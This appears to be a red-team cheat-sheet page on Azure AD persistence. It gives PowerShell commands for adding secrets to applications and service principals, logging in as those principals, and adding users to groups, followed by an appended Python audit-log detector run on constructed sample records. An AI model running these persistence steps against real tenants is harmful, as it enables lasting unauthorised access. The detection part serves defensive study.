
Azure AD - Persistence

Add Secrets to Application

  • Add secrets with lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1

    PS > . C:\Tools\Add-AzADAppSecret.ps1
    PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
    

  • Use secrets to authenticate as Service Principal

    PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
    PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
    PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
    

Add Service Principal

  • Generate a new service principal password/secret

    Import-Module Microsoft.Graph.Applications
    Connect-MgGraph
    $servicePrincipalId = "<service-principal-id>"
    
    $params = @{
        passwordCredential = @{
            displayName = "NewCreds"
        }
    }
    Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
    

Add User to Group

    PS > Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
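
Detecting these changes: each of the three actions above is recorded in the Azure AD audit log. The following is an added example, not part of the original page or of the tools it cites; it scans records shaped like Microsoft Graph directoryAudit objects for those activities. The sample records, the allowlisted `deploy-pipeline` initiator and the function names are constructed for illustration.

```python
# Audit activityDisplayName substrings mapped to the technique on this page.
# Substring matching tolerates the dash variant in the "Update application" name.
WATCHED = {
    "Certificates and secrets management": "secret added to application",
    "Add service principal credentials": "secret added to service principal",
    "Add member to group": "user added to group",
}

def initiator(record):
    """Return the UPN or app display name that performed the action."""
    by = record.get("initiatedBy") or {}
    user, app = by.get("user") or {}, by.get("app") or {}
    return user.get("userPrincipalName") or app.get("displayName") or "unknown"

def find_persistence_events(records, expected_initiators=frozenset()):
    """Flag successful changes; expected_initiators holds lowercase names to skip."""
    hits = []
    for rec in records:
        if rec.get("result") != "success":
            continue  # failed attempts changed nothing; review them separately
        name = rec.get("activityDisplayName", "")
        label = next((v for k, v in WATCHED.items() if k in name), None)
        who = initiator(rec)
        if label is None or who.lower() in expected_initiators:
            continue
        targets = [t.get("displayName") or t.get("id") for t in rec.get("targetResources", [])]
        hits.append({"time": rec.get("activityDateTime"), "finding": label,
                     "initiator": who, "targets": targets})
    return hits

# Constructed sample records (not real tenant data).
SAMPLE = [
    {"activityDateTime": "2024-01-10T09:00:00Z", "result": "success",
     "activityDisplayName": "Update application \u2013 Certificates and secrets management",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"id": "a-1", "displayName": "Payroll API"}]},
    {"activityDateTime": "2024-01-10T09:05:00Z", "result": "success",
     "activityDisplayName": "Add service principal credentials",
     "initiatedBy": {"app": {"displayName": "deploy-pipeline"}},
     "targetResources": [{"id": "s-1", "displayName": "Build Agent"}]},
    {"activityDateTime": "2024-01-10T09:10:00Z", "result": "failure",
     "activityDisplayName": "Add member to group",
     "initiatedBy": {"user": {"userPrincipalName": "bob@contoso.example"}},
     "targetResources": [{"id": "g-7", "displayName": "Cloud Admins"}]},
    {"activityDateTime": "2024-01-10T09:12:00Z", "result": "success",
     "activityDisplayName": "Add member to group",
     "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
     "targetResources": [{"id": "u-42", "displayName": None}, {"id": "g-7", "displayName": "Cloud Admins"}]},
]

if __name__ == "__main__":
    for hit in find_persistence_events(SAMPLE, {"deploy-pipeline"}):
        print(hit)
```

Credential additions by principals outside the expected automation set, and membership changes to privileged groups, are the records to review first.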
